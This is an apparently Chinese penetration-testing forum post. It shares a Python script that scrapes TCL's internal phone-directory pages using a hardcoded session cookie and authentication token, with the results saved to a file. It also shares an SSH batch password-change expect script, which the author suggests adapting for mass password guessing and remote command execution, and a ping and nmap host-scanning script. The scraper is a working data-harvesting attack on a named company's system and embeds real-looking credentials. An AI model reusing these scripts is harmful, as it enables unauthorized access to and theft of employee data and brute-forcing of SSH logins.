referer:http://wooyun.org/bugs/wooyun-2015-0141726
#coding:utf-8
import re
import urllib2
import threading
import time
start = 1
end = 880
def getContent(respInfo):
reg1 = r'<param name="flashvars" value="(.*?)">'
re.pattern1 = re.compile(reg1)
match1 = re.pattern1.findall(respInfo)
info = match1[0]
if info == ',,,,, ':
print "--"
else:
writeFile(info)
def writeFile(info):
with open("tclinfo.txt", 'a') as fd:
fd.write(info+'\r\n')
def request(end):
print end
try:
Url = "http://eip.tcl.com/phones/ViewInfo.aspx?RoleNo=0101&page=%s" %end
req = urllib2.Request(Url)
req.add_header('User-Agent', "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1795.60 (Edition Baidu)")
req.add_header('Accept', '*/*')
req.add_header('Cookie', 'ASP.NET_SessionId=1f44ueqbxxqb54fdk5lj4czv; LtpaToken=EndxvXShVNqSXQ1doiNyTvMWR6Y/X7J+5Bhs9cvrb541MCG5lJXu/8gxhhJlvnyfFYnGk2p+2thMr5a2qOpl7PaarQ5jSZySXsWUay1nPIUV0+0nsgDweLKsyM2p+w76P0onwZgcDBCObVl2N9wVdghK/nCZ3oGtbd+RAtA7j2ovVqxjJ4kDjy/UMML1tbb73c8zC6dPh05FI8ge89sqgnDwwhcVNaACG+fF7h7OCrEhJA1IQMSy9SCP8CrQ9Vw5Xs4IwXkzwyFptCgAxegMZIdhG92p9gRbNvdra43+SxsxUq3D+jW4jXxiWV5qCy9gifWfxqFx9sE1+mB3Q+nRG66+IT+meski/nD3KkRaBqq+b2HfL/gv7fDaVD5D15poiNtjAqip6KQ6MudME14VQtrw2NWyY6hg+G0IW+C55A5gsBBGbpuzJn8AS0a8kdAwTAECd1Vi1fBCKyPwGiHGAA==')
resp = urllib2.urlopen(req)
respInfo = resp.read().replace("\r", "").replace("\n", "")
except:
pass
finally:
getContent(respInfo)
def main():
global end
global start
while end > start:
end = end-1
request(end)
def thread():
a = threading.Thread(target=main)
a.start()
if __name__ == '__main__':
for t in range(1, 10):
thread()
最近在做渗透时发现管理员的几个脚本,感觉还不错,以后可以改改用,这里分享一下
一、
批量改密码#!/usr/bin/expect -f
set ip [lindex $argv 0 ]
set password "aaaaa"
set oldpassword "bbbbbb"
set timeout 10
spawn ssh root@$ip
expect {
"*yes/no" {
send "yes\r";
exp_continue
}
"*password:" {
send "$oldpassword\r"
expect {
"*please try again" {
exec sh -c "echo $ip >> fail.log"
exit 0
}
}
}
}
expect "*#"
#set passwd
send "passwd\r"
expect "*password:"
send "$password\r"
#confirm passwd
expect "*password:"
send "$password\r"
#send exit
expect "*#"
send "exit\r"
expect eof
#log
exec sh -c "echo $ip >> success.log"
调用脚本:#!/bin/bash
for p in $(cat ./ip.txt)
do
./autocmd.exp $p
done
echo $?
这个脚本从ip.txt里面读取ip,并使用oldpassword进行登录,登录以后执行修改密码操作,并把操作成功的ip记录到success.log中,登录失败的记录到fail.log中。
拓展到渗透:
1.修改脚本,批量测试口令;
2.修改脚本,批量登陆执行命令;
3.。。。。
二、批量对主机进行探测#!/bin/sh
DATE=`date +%y%m%d%H%M`
echo "==========PING CHECK=========="
for p in $(cat ip.list)
do
ip=$(echo "$p"|cut -f1 -d",")
ping -c 2 $ip | grep -q 'ttl=' && echo "$ip===the host's ping status is YES" >> /tmp/netcheck$DATE.log 2>&1 || echo "$ip===the host's ping status is NO.Please contact the administrator." >> /tmp/netcheck$DATE.log 2>&1
done
echo "========PING CHECK END========"
echo "==========PORT CHECK=========="
for p in $(cat ip.list)
do
ip=$(echo "$p"|cut -f1 -d",")
nmap -sS -P0 -p 22 $ip | grep -q "open" && echo -e "$ip===the host's 22 port is open" >> /tmp/netcheck$DATE.log 2>&1 || echo -e "$ip==Tthe host's 22 port is closed,please contact the administrator." >> /tmp/netcheck$DATE.log 2>&1
done
echo "========PORT CHECK END========"
输出格式啥的,自己改改吧。
希望对你有用~